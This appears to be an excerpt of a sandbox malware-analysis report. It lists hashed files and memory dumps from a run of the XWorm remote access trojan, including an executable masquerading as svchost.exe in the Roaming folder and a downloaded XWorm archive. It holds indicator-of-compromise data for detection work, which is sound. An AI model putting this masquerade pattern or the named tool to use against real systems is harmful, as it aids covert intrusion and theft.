| SHA512 | 64f4e05f752129601e42e53056082b3b0fa21d3346686baa629a6701e4a4f649b193a56f66f62dc7c108400ade4be00ffbc9a9beab0c1eef347965da70df4982 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a62c8895544fcb0ab42fb29bbbb5c543 |
| SHA1 | 38dfb878cd9da7775ffef490986c980cccb774eb |
| SHA256 | 7f3e7d7190e94811f8509e6fa583063f52880779b2247d963393ab9c200af791 |
| SHA512 | 085fa64c5657a7c8c03aaede7b60e0d0b1ce745ec03196c356de376e9a2bb5f5d64fd4cd973008d843c6ba0c075c8df4aa22b32bfa3543b924d25568d11a2cea |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 19d703071c38042864ce2c659e24526c |
| SHA1 | 1573ac8a3d7a039ad196dfd4708f576ddc19d7f6 |
| SHA256 | 0d0881224c295552155f04d27555147f19d925b9792a53b956793ff449aac77a |
| SHA512 | 246ea3759a1870cc832cbf60724e3ec0f16929d778e709542128c7a0f66c6ca52231a7f3e1c7e633bbc697d9ed8fc3ee82891fbda2573b49690bfea60d447679 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\Network Persistent State
| MD5 | 0b6ae2482206eabd98184407d4812b24 |
| SHA1 | 9499b92cbfd52593552b66bce42053a7715cff24 |
| SHA256 | 979703a7f53a7ee08efa6ba510651464335b8c22e7a608692609bd156918eab6 |
| SHA512 | aa234215b9c229c88c41921bba8be9ea7b7603ad4ac5f8556f1378f549c487902cabf9cdfd758de531b26ea8f8ff1c32626ac6a879d15feac1e4fae2ef57e597 |
memory/836-1864-0x0000000000E20000-0x000000000152A000-memory.dmp
memory/836-1865-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp
memory/836-1866-0x000000001C150000-0x000000001C160000-memory.dmp
C:\Users\Admin\AppData\Roaming\XWorm V3.1.exe
| MD5 | 37a9fdc56e605d2342da88a6e6182b4b |
| SHA1 | 20bc3df33bbbb676d2a3c572cff4c1d58c79055d |
| SHA256 | 422ba689937e3748a4b6bd3c5af2dce0211e8a48eb25767e6d1d2192d27f1f58 |
| SHA512 | f556805142b77b549845c0fa2206a4cb29d54752dc5650d9db58c1bbe1f7d0fc15ce04551853fb6454873877dbb88bebd15d81b875b405cdcc2fd21a515820d3 |
memory/2808-1885-0x00000000002A0000-0x00000000002B8000-memory.dmp
memory/1372-1884-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp
memory/836-1883-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\svchost.exe
| MD5 | f23f6537464f47132cee7632b95daf28 |
| SHA1 | 1981d5d8ee8e600c613b3c11fdff435172ca725e |
| SHA256 | 32824c331cc98500763e67b45e616d9b0f5a63f21b87439d18feaac7b35785cb |
| SHA512 | d58575008b8358c6546f7605d5da27c2fd3578240d679a608c5d15950ce809c0af00dff0b989514a2f3a08e30c697684dcec7695ddbba659e2fa0811280a5a80 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zvgklhg2.izc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2fc9e110688386f553ae9bf31219b3b0 |
| SHA1 | 89ba40813cb0a5efcf5574ad174f1573ca4d5e96 |
| SHA256 | d242a64927ce6db904ab31a13c78c87fa41c9c0f2b9c7e6c3b40b50c18cf2e37 |
| SHA512 | 2753aa34f6cb357984ed3f88107174bf81f4bb6513dbacf7373eed4d281c268c2925201142d59f60698072d00b0a664199fe449b3055244e7f2a471305253bec |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 0dd15873132d24d04ffa1a263651de59 |
| SHA1 | 4e3ef0039280c5887607f50f2e7537d4c537691c |
| SHA256 | 2ee3858d9fd18661f0359f85f37cb3e264a9f273567d845744decbb4a91f6ff6 |
| SHA512 | 912444becd0be19d44333a5c625ff1e921151ea3c2eb7b9df45f8e2bf03501c096398361118702279519fcf8fa645666734d37fe6438f1c3ad291c0e23c4af81 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | b9fb7f45ef5b851359c423cb9f0f674f |
| SHA1 | 877494509eadcfb3697b90993ccce68a3cbbf05d |
| SHA256 | 34bdfa74d51db6f48d1ee14386b048f23428b9a8ea1648b885e07502c70c363e |
| SHA512 | 49850062d1cad73b120c3bd1963c0ec4ba14340b7527a9098f5f5da13b01f347945ae8ab514b52218d4448dab6fd694d14fa2590d9b48d303425866f508eb037 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\Network Persistent State
| MD5 | 98ba8fadb40473d6e96dc8c13486be6b |
| SHA1 | 82c7f83a3dc7891487167f4718dc6dd111cb551b |
| SHA256 | d9264b150c87cd96978a005cb97fe8226c42072d55cc6ef8c2105f11bcc32f7c |
| SHA512 | 2049aafe24022d2b3933702089f79d056c8e8a5ca6d2cb9591b3aa2645f58a6c3ba511f5035c35de9358ebdc7ce1486e134004d3e6afd87da80a21506c0781f4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 3a1f3a78686ff36480d9874b474c64f7 |
| SHA1 | 160eea8b5c60b2cea0eead7b96bb995667c2901e |
| SHA256 | 34652429ba21b37bc0c1bc881926b696886fb9e32c2112a3b9d5ab6f38829bf9 |
| SHA512 | f61bebe70bc63edf3bf72f155ff88c5b90cc60b734687f797a001254d2cd078e0b85c3acd0d3f586de579f64d7dc00c877ad3f6ddbf2b3b685e9dd0b7e8b01f4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 2cb051c72fab87f21aa8755f97290a29 |
| SHA1 | acea95aa4d410ff1cb4a00d889f131b6b081ee5c |
| SHA256 | 78695876341db0bff5958416af2c1b017a46f38c3c9d7e0004ac7536ec50cf14 |
| SHA512 | bf1facad2caf58a2c21e80fe386cacae00df5e2afd160619f7bb204f81380fd2c20ed09e15846362b690d64fac89a4981f69fd21420ea0a09f8ea8dc108d6041 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | d206c39d581388e083961b8fe5087f2f |
| SHA1 | eaac9ccd93014ad1167f96f948ee1112a8e273e4 |
| SHA256 | 3ae0a8eb3c791f3d6bdf767eb635f1e0c252031f3c69bd233be923bf07d73128 |
| SHA512 | 0b2942e2d14eba6d41a97308cbed1f664c9bac97c6ef9666b916eeaaa2104ede39d0fc9b6aa04501cdf71171b30b8e1de96fd9cc1573e97846730493ebaf8c55 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d7b4f34c5102c38ad83658ed7bde51a4 |
| SHA1 | 618b91e3de31a6f1fcebc67cb66a2100d5e53582 |
| SHA256 | e339d856b022027fdfcbe376280e68e24a395fcdb7a2c73dfc96964a7fbf7932 |
| SHA512 | 80f58c20a0bd41e48acff6b867de0d8a6e4405b8021396033e6071d2e1268d58894cb86d63efe022a95caf65d93c46cda3e31d497bfbb4f3caf8b24df8067d86 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 6ec45fcdadb37e1c09b9d9d519fa1529 |
| SHA1 | 21ff52d181a54891bdf5af964b2ebbaefac0d1df |
| SHA256 | abe1b04f25279c834a49e164d1e74e1e8e126ef3bda8b3d93287a045444d6a1f |
| SHA512 | 84187a045cf9cc4f76d4fbe33c9d0d45d3648c22d7fac1e977599f7038807e6a35600d8069a207f441785a560d03f1ef13d866cece709238ef8fe3de6729db81 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 9990335ab856817d460d01eeb35143db |
| SHA1 | d5862dfc199cde029c1260e1d72eafcba76da0d3 |
| SHA256 | 1641b5d51b6e914b13daeb4bcac377f9894d829e63460fecdb7603ce8c633eb7 |
| SHA512 | ea1dfb74b21799cbb91e5814241731e0ef9533904b61222f5ca83602b8e9be9f544f8c8a5424250c3da46c2c6a098418339f4bc8f067efca6a040bdb768d12fc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f8461123eb29c4f2a65ae370e57085c4 |
| SHA1 | f058e97ed6c251a91da3ec57f183dedc94d5439f |
| SHA256 | b3ee77e68d749919d3ff1619f22a4c3bc6b05ee86c2684474cc13c0f98e03c1c |
| SHA512 | f06b471a660d8950909a91e8b2ebacd1f87fc1fde2e6c9ddc2e296ea45c87bdbfb739271fa23cac55ed43500084a57519292767952ecc7f24709e288a2f0c810 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\eb5a38eb6d74971f_0
| MD5 | 101fec33f560fa923de2f7a0572abaf8 |
| SHA1 | 15e8538f6f5b1a2871e1cd2413789a88a1e42bb7 |
| SHA256 | 85887d1748ce9e0423f78fe3f93b8c7cae81752c6a21c9065a64d6d1e5ff39c8 |
| SHA512 | 7f784bb4923ede7ea10858eeb7c360ae0a79a924096d432ff20d0df3d3a3c373d35a820927c1d09c245b30a26bb7500f23b3150aa8f0e64429a1449172161781 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\20f6bd3fa48d5b7a_0
| MD5 | 8ee5e7fad62c0277f4842ca208880b82 |
| SHA1 | 4502b091f1869a002c5bda1d3d1bf120d3a6d9d9 |
| SHA256 | c4f3a2ec9371f56b76232c36fc126be32d79b3e07c2bc342bf2b796f81ce4c92 |
| SHA512 | 03ade4db66080fd39b51fae44bc4e64d320c4d69389d315bfd23ed63e17fd6c271a9ea67a93a854bcf27646445121782fc8373406fa847d227dcfbed34e724d9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\4d04044bfb8f9703_0
| MD5 | a307c8ddf4c8990dc1c75a4c67f8aa5d |
| SHA1 | afd8a3ebb706563b09256e95e7f5fcfca1785223 |
| SHA256 | 7e90cbdcac73f692018d2e4bef6e4dffe86f4e890f5ec6e9feec660c6c16aece |
| SHA512 | 3456dbaed4bc326ae359f08ced6ec758a2d9717954d59c9f6d3f665992474663b860bc5d3321f52edeee54aa8289f8f27ddd0caee69a40002114217f7a2db7a1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\26cd902f6ec57e12_0
| MD5 | 49aa74bc470136c7596b582cb1023c6b |
| SHA1 | 04723b757ae72876ba8655ca69fb5b3e34a2346e |
| SHA256 | 15a6230a191c1bfa8c55019b04a0f7b0138a5df24cc05235ac9085e397268820 |
| SHA512 | 22ee7639042f7158496e3ed6c063ca5a3d22ade09dca79ff79affb1e6d08885eb4e60c57897df9971438504297153ee2d1b002be4607077b95f19030fc1199d0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8b2929d923d98769_0
| MD5 | 5256c1009d835c71dc7be230de07eb3a |
| SHA1 | 2352c7dd03048ad878b580e575582842ebc2ef33 |
| SHA256 | 7ca58282df014c2de4d6319f9fe47054a73637444bf6baade9c2f7e4861e24c1 |
| SHA512 | 5564489fa59f47e3b9138b2ecfbad8f0c6cf8840d1ecc48579c22a1afbb4e34d4eb964aefef8a5d8745c8782a4b57fdc74cadd1382527f9b2c894c2cfae90bfc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\0debc5fbf5dadca9_0
| MD5 | 3c9b0c077f77d9a6e4b6fca28ae6b603 |
| SHA1 | bfd1b951b9270904623ede7551b0300b6bfd46a7 |
| SHA256 | 54369152c15ec36c1960c3d090926f8c565dea1ca06cac7ebef6e7ebf43677b7 |
| SHA512 | 80839e03755bdeeecd6206b86d679ab393be0acc17e0ee6e2bff5ce94e532d3874afe52a0ffd8e44638ff177d839730cc06bb5c9a64333c7038eddf3400a1a5f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\2501308e6cfb93d6_0
| MD5 | f49781b6e7b385e49029af693dc1304f |
| SHA1 | cbc6b8252596a9729d5a5160a0da8ab87c6c409e |
| SHA256 | 2923d4f5f818a8357f66f9ff933348393f6448a37145635c341405bcd27d025e |
| SHA512 | 872d4448a173162dcc2a216f959c62053ec6787b940b042d1eba50e949802b5d49b7500a5099b623fd32453a47fe04fd2f5686b59cac8e676a90e6442f63fe3a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\ffe62a08b235c1d9_0
| MD5 | 31d6448fa95108c092cde31ed4aa5d61 |
| SHA1 | 30934831bfc104189408763d079ace69e341cda1 |
| SHA256 | 6e31259ff974584a07510f79992b19db653f8669a02d91c2f069d271d3b50559 |
| SHA512 | 724801d59b246309e0faa56a9fcbf5e0119a4c20071095ba0836470540b164183a666244af5ebec44fde8995b2423924b361a96c42ff7289214eb13ed5cac372 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5d8ec1bc548746d5_0
| MD5 | c6a62c1534e96cd0ba897f17b7f82272 |
| SHA1 | fca11abc6cfa67720782e9afb4cf0a1a97e32af6 |
| SHA256 | 32d728cdc98b960ca8ade5e002bac89348a5f247ce8a201099b3615cad41976e |
| SHA512 | 1ddbee12b0d32e652f624c0785c78a022eb5e341ddcdc15b98afafb5a939e70092e84c756cc0bcc4065a519ededd07a1287d8981444a45fc009ffe82fcb85ea7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0348076ef3cf027c94b7e4b50afeec3d |
| SHA1 | 5ffb97188b6c56112d1358418c6bfe99b2830469 |
| SHA256 | bf0614e0eee5d777cf0fe503eaf6ffccdafceeab30dbe6355ea0463669080795 |
| SHA512 | 631be02a2943629755f2320bd6981d19f9013f12090304db3123835485ea41059042b01af9d73bc92adcc610a4b2106a17960041c4ac645bd32322112652a9eb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 4a2659ded74630a59534b1ee939cd92a |
| SHA1 | b5be65e002464a5efe70ff2fedaf85f3ab97430c |
| SHA256 | da9792ae4665544f773fbca52a64e7ded9d831cf43ea8968f3f39fc352d93a57 |
| SHA512 | 008d48246e2c668dbc6b24e76ea37a4087fb66b0b4b5f2443b01c7aa6e3a34bcd077bf1779021f93b8af0205f66354c3e350226a40965bc7e9ba094931861959 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\cf937100869d08e9_0
| MD5 | aa0768ef861b6fbcdd6674e0a07242ef |
| SHA1 | 66fa9a6ed25a044ebe164ca4b0f7d3f9b6b813c0 |
| SHA256 | 3a89b7c4c3ddb2c753f5d6e8a45d0fdeb0548c538b5c710cbf53b4e7230f004a |
| SHA512 | 0359487726053d9fdf30ecd5f53ddf39a43943932262def456ba9106c58661f9dd4456b3d16594e5d939f7fa8c84c129c673ecd4dce601586e2b857b20aaed56 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\093c2bbfa743dbf2_0
| MD5 | b15caf13d9eead8350556098b0787323 |
| SHA1 | aa5f2476cd2f02d2327aedb3785fe3116a68a6c0 |
| SHA256 | e28494a810b738076ea81d4927b3bba9732f9d427eb40a710961ee109d797378 |
| SHA512 | b7d6f2d684f20a5ea58ed1c4a3a5aaaafbe705c8b528a862e3f081bacbcf62a65af7758bf219cbb043f2c67ac390ca42d2bcd6bff88e39b272aa8188b160dc27 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\27e087ae1db041bf_0
| MD5 | 469435d494f6fdc79ac25e586216d744 |
| SHA1 | 7cd97bc9ac163ef3f9a1e217f87de919a90fcca4 |
| SHA256 | d5a0f837bc925bed20469c9da527b4580ec4ae136bcf935d9ace9fd231fb5a02 |
| SHA512 | b5042d48a2abc02241045142f92f86e451a3944246b366e896fedbb0deda1c2386a2ad84d22cea2211df4d291e32588d080cfd807df80ed753bc67467fabda25 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | ebe93d473eafd8f3366708a3ee3f4d23 |
| SHA1 | 0da1939fb75e50069fe60048317cd1eda09851a2 |
| SHA256 | a203fdf6a2e1e564f85197170cb8a2579a817c0cc0dcb1d8ca29787a469f4e14 |
| SHA512 | bca52d2d54166e437dd67e4bc09ff996fde60ecf7d5b1be2821dc7c70d1aa7ac4ed8854c259df41b0648a4c420ccdaf58b6368c09f978833b856eb33f41b8387 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8752f78686f49746e8a6b753d785e17c |
| SHA1 | 5591f6f9fde8979eda29649e06617a96d2fdad95 |
| SHA256 | 3beae194357c22c4b71101e5193fee3ba3595bf1ef2ce0b1013a5f5470d9925d |
| SHA512 | 34b3a3135a35f465c37dcdbb1e4a050d81a2c515c6f3ad210323ef14a8b84fbb7151d25a3868733d243b16966a0e28bfdc66e8800cc37fb2c4ee4a3a475ced23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | cf82f84e46c80cb427187c7ac10f8e4e |
| SHA1 | 5f34b312dbce4107fd158a797eadf23d741754c0 |
| SHA256 | c530f2ee72b95452315c3c18ac7cc78458d94244bd7acad855663c72eae16319 |
| SHA512 | c7a51320cc49cfa6a082596805ba8acc4db3d7ac8a8fc07876fe3df60154cad79fcda7503ebccfb7fb819417853170f30c925f5aa830c2c141692842363b8ee7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 72d549cdb80c143b7d146f0421d097c9 |
| SHA1 | 48526793e4613c7f25344331cea1992ed46742bf |
| SHA256 | 061d3a4baf51b09685fccaf55d246ec7f005cb4cce2c99f0e08dd8e82176f168 |
| SHA512 | 90de396e8be4bc8ef4b0ba5e949788b3f7aa20b0e10ab94aa33544d3bb6a27bb6750af5797ab17be4b7ff9f32d717f3edd8f19486022fa7d286c8aa87bbd19e7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 2c1f236dfe161aa30a3164c97a434489 |
| SHA1 | a18ce8551cc431bd1aff599494436c4a74e09ac2 |
| SHA256 | 749a44692a757caa1994d8cd174f9bcc4fc2eb38b9aee8cb158572b7934a0192 |
| SHA512 | 7f0d47cc6f0ba4f58446ccb2551ad53545bcda6d53bae4dcedc6acd04c31af0899143db04252aacd60aa42706bbaaf5b42d8b4e3da6cc2f2f584acda95150391 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fa9f26904eb30b7893f16c4671316417 |
| SHA1 | feef30f8863a0bc08661a9dd7810b3b589dc9ed2 |
| SHA256 | 6e75b0119771d0aa1b9425dcbf52d777f5e2ced2b50c0cf717458ce633b03719 |
| SHA512 | 7000d855ef043158f8b805d347d637a32383391a3f9947c331dee1379bc0118155c48efd2e693baa6b2f236d9d5556b03f9a153abfc1f357c656140959d8a7b5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 84ebe621dac680f04d485eb31e56bbd3 |
| SHA1 | d56625ae726b194bf1b829aa5c44d46d28015766 |
| SHA256 | 967807a5c8ec7ca0e3d1f1df459937c763256e2488d5bb8f698e64574d4319e5 |
| SHA512 | 67d999b10980ee029f872a15a5759456c87270eddb9620af3460c8d9202d1fa67120eb36438013129bc0de8f5fdf593cfb865855b5e92b6ea4bf41698f42121b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 47309c14ed9070ee71bc419e9d6544b3 |
| SHA1 | 2b2a8124ea71bcb218cd47ce15aaa3dc36cb951d |
| SHA256 | c3661fdee0c10dde771da75e009946369efc20bdb9566c691809c1e1de6bd085 |
| SHA512 | cb55068c53d2be2ebac7d06b8cf450f754a36ee1e1053b87d4186733f43aebaaf6f90f81d62ef66ed4e4595ae32781acb1d6647074d157ac5e7e0d0bbbf1d0e7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 2cd8294a62b12075555d8ba7e7569ffc |
| SHA1 | 514c11028aa29f1f00338993c8239925a5867997 |
| SHA256 | e8e7c9e4d3203a27ca8e5f3f07b80039ca212dc1b1f309041252e5d0d959665e |
| SHA512 | fec4a4f23bd2f943ec29be6ae445923a61d7d1bbced9fc8c69af3e86ce9ffd6627d35239ed4b16e0001a97b8719f6cca631ec7695992c52e6828b967fb00607d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8184f4fe7c3da17208fafbba2421c4c2 |
| SHA1 | 33ffe2c2784dfa9ef251321dbc85d768da139e14 |
| SHA256 | f4f7feb1e1bf1457a7b4e7812c5f5631d072dd0df483e6b5c6caf792e0266130 |
| SHA512 | 516487e151b453a53b31ebe4c7e9f00fb8e1c59dccf109304bdf4ad372528a98cc49e8ffbf933bf45e2675a7eeba60a7447c577d4de5bf511c2a75dec2cd9ff9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003a
| MD5 | 9ec7dceb8c749a75852eab1e2870704e |
| SHA1 | 118df18e954ac58468ea0e49a42ea54014769408 |
| SHA256 | 4bf8610a3bf59b622143f07050e323b17a901d652f7c98ef56a191cb811d825c |
| SHA512 | ea68bc63365e9bdf603d3f3a9bb28a44448b8f4a6e8411365b4eac2cd77b6d3e546a9e9fd6161038ab70556bf0aa2425f25945169b67be4ed55ac1daf51621fa |
C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main.zip
| MD5 | 7f450666e9781393ff2c69a06e362939 |
| SHA1 | 2d5eeb308b6e687a3c5acc182572ae398a058f19 |
| SHA256 | 973de3e5740ae8935a9d001e60dfe3d12e728009b7e5283116627dd6465d5902 |
| SHA512 | a8ec01ea493a8b91d0b09a9bbe70e98a90fcd8e2c4cb0e0f2fa142f38fe24c5557be754fb2f353de2b0b7c83ac1a17382a6731107cc635072b261691a549d15e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | f75b71e65261d8f7d8067fecec5757b1 |
| SHA1 | 99f9242c232eb91a1ce9c7d0ac1938475262ab0e |
| SHA256 | a683742a421f15b6afe7748fed135915eb5002dc59184089088e9f10c9e911ec |
| SHA512 | 97fd9704f4a02baa1ce6ea43f75db35ddec77c853a53a1a209cd5438aa25a6f1060033740bafd8ddf07bc3ef396c65d8506960a29e75b6c6243f78b0e3b58f5c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f4a8e89b97834504463bac3beeea6a23 |
| SHA1 | afa08eebf16c8b47db7e262fdbd9c96e0663dc65 |
| SHA256 | 751f0fd0e6a257a1fbe99eebb5ac2c8e0f009fac37c1092d5b103774cdfb856a |
| SHA512 | 4819ead7816bf8ef31ed965e1eba4b965fc720e52beb9d0059739b80f73f4a443a1394a820893190342b0c9701bebe7eec8374b3adaacd7e269a64f580e3ed73 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\180e414f012d8ae3_0
| MD5 | a40d94301fbb1d20ce9f592980acd9dd |
| SHA1 | 19128fa468c0e9a341abe368421f4ba1c121b41e |
| SHA256 | d6f0120a04dc1f3d7bda8c905354886da837365a8ab72b5b5491f8b08f721aca |
| SHA512 | 93f0367e5b84f17e4fb74c0dba94f0765ff289b65059abfac444e79e3f546bfca725607d067498ad26c8e528fd3adbd2414ac850c1bddf6259e86768166b9b7e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\600f2ddd54cfa320_0
| MD5 | b9082dc5a604ca19534d0d633ebc7985 |
| SHA1 | 55c990840cdacf8846121cd40631c26f6c8967df |
| SHA256 | 70aa0c296157d59f6a7e2f8ad8f8755140bba0e71aad0c0881de696220963922 |
| SHA512 | 0b656a3e90f810cf756642f4b0a6df93780eebc5090033aa0895261260cdce723be5abcd9d6d71fee4358f98e1eac20a5f6487a935dace9f54121fcfbdb3b3ff |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\ca5b8db230134375_0
| MD5 | 9fe0fbfbf3cb48b19e90baa1c2cd53fc |
| SHA1 | 6805018f20c98a3c23e474aa69c0152b6e46b194 |
| SHA256 | 3ddb79717f092e703d4dc3f4adaa38d1d13a6dfd1ebd1ab8308471bd0cbd0b34 |
| SHA512 | d4d2f0e89925dcd8f0bf6ab7f6aa86c278dc110397f9438d40c8b9d34777e53e2b762deced7fdb5b3f7401da9d931af84b80e85b4dd6c2b77a41172ba50a2a65 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\0e1cc0aa9a9c464a_0
| MD5 | eb58abfe85764b3065595869c9d63d7b |
| SHA1 | c6dd458bd893226ce78a2fc22fb200cd3589fa17 |
| SHA256 | 5360dca37960b6d3571670b9862bddefdf6a398aa2a127c4779b7cd90ee6261c |
| SHA512 | 8d1f181e8c518e0ca273c6707cc2c287cd071a55ca6892b7512a921492f19f4db5a76e68c03fbf7c75d6a5ee1dcf70c6ba87b73be3e8fd3d256898d64d501bdb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\2c3dae2387cac3b7_0
| MD5 | 2dded1f8f7d01a7c35e3688e577199e8 |
| SHA1 | d469d5ef1369e2b9789e3c519fd6a1b58d005760 |
| SHA256 | 553d5444dc9e7ed66f223679c6e3e57f0eeb12ef19850877736491ad4a5cfb5d |
| SHA512 | 0f007381250dc40ea248dcd4a0e96979f5c90f12824843b5114bd3f910719e7980541292c1a8d8141a9197e8bf077856e0064a7494ce066c66aca6957f8ef776 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5526e5d56b1f071f_0
| MD5 | 4a26200ccbed99c7066d827aaaf8983c |
| SHA1 | 5e5f220376fd97bba05ad7d13f7ea5891a121ab6 |
| SHA256 | 405c895e26e3f3ecfba90d413a849fc80555faca33cb4c15a4579994578a9c10 |
| SHA512 | f41fb72790ce5eea04fbece671df9a46a30a805b40612495b1771c0818f3242b03c0c59856e78ca37e4c9356b9234462bc3fc21a5c6afe5d427cbf0d927b1020 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\4944e26945802309_0
| MD5 | 047877f87b8844dfa6d4db83baa12df1 |
| SHA1 | c09c48e888b391c966036c4a71f7eb656da5d321 |
| SHA256 | 23402b2aef55061cc083f700415b7746d2fd943e5e5e2b613eebb4ed0d2d7847 |
| SHA512 | 104d3ed31624b3782ba80c0df69262c9467989dddb65a99cfccef1682c8715974e823f027c7ac0b6c45738834c56b261d0ed53eecdea8679bf329de4f8495d67 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\d454d3e8f372d3b9_0
| MD5 | 58d4d6087858e9d31b2d12bebb52f0b2 |
| SHA1 | 59e58c07fc2043e8f8e1eeadf47976430d775347 |
| SHA256 | 867e12b964aaf8f6d15757ffcca0421955110d0f68da825fff49f6799a85645b |
| SHA512 | c94367f7f01ce2c173b7b9db7b555c4ce5f31d974c37f5ea2d7fd73a17dd9f4c8752ef12cb990366b59951b23880d8d096d9c60478a5e2a21aaed891dd13fcc5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003c
| MD5 | fdedc7356552ef0724257c2b397673ba |
| SHA1 | dccb7b96ab20b5fe855872378328214c9a957f33 |
| SHA256 | 561ba8130265f08767b506be6006d451507a6ede0b1e99ca5c0c3314a2b6afb7 |
| SHA512 | 754d542ebfb2e035c3a0fc01a0f6bccec74ceb9574b376d433e487728f7bfaf03980cea1b3ae8ce4103e6d27909a7781c7f937be6482d105a919d49e7a021568 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\a5e5929ae65652a3_0
| MD5 | cb453b47656efb0ef96bcc81f023bbb9 |
| SHA1 | 786cb9cb2c0166286e42686d5ac454327a7ab4f1 |
| SHA256 | 23fa9877169b8d9fb1f594417609500ec705a0c57d22d75212f1a72c7dc33f45 |
| SHA512 | d5cb4e3aefeed3b79c8c270472754050b08c4b911e93a25b9ff74c2473b989a475bcaebe1294adeeba601dda592a85122b07aae27bc1528f73949a9a2d756f07 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\a8377101ac0f3165_0
| MD5 | 55e506bce266263873186b2089be4b87 |
| SHA1 | a6ab1cd12c9c6ef157818eaf6e0f0fc3d72076f6 |
| SHA256 | bb0dc16c3246cda97a31bf5f629ccffe6c6bc7c2d062f70d8e1a73c5361c3a52 |
| SHA512 | 032d14aed9a29b796e7c3a8ae78d0b818510ac8c42c004b0f1152e9183661d4e3e91974f3b359cddcb160df294764e5b729fab2631fdce96abfd6c9f7404973b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003f
| MD5 | c09e0625df7a8f20db9b66acb754d42d |
| SHA1 | 60559158068f238553120a055f463199c7fed51e |
| SHA256 | a069a0771667fcae932dafdaa94d953223e4090536256db245285676c832617e |
